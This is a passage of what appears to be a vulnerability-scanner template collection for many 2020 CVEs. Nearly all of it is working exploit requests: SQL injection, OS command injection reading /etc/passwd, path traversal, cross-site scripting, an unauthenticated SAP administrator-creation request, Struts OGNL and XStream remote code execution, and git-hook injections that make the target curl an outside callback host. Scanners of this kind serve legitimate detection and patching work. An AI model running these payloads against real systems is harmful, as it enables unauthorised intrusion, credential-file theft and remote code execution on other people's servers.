Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST 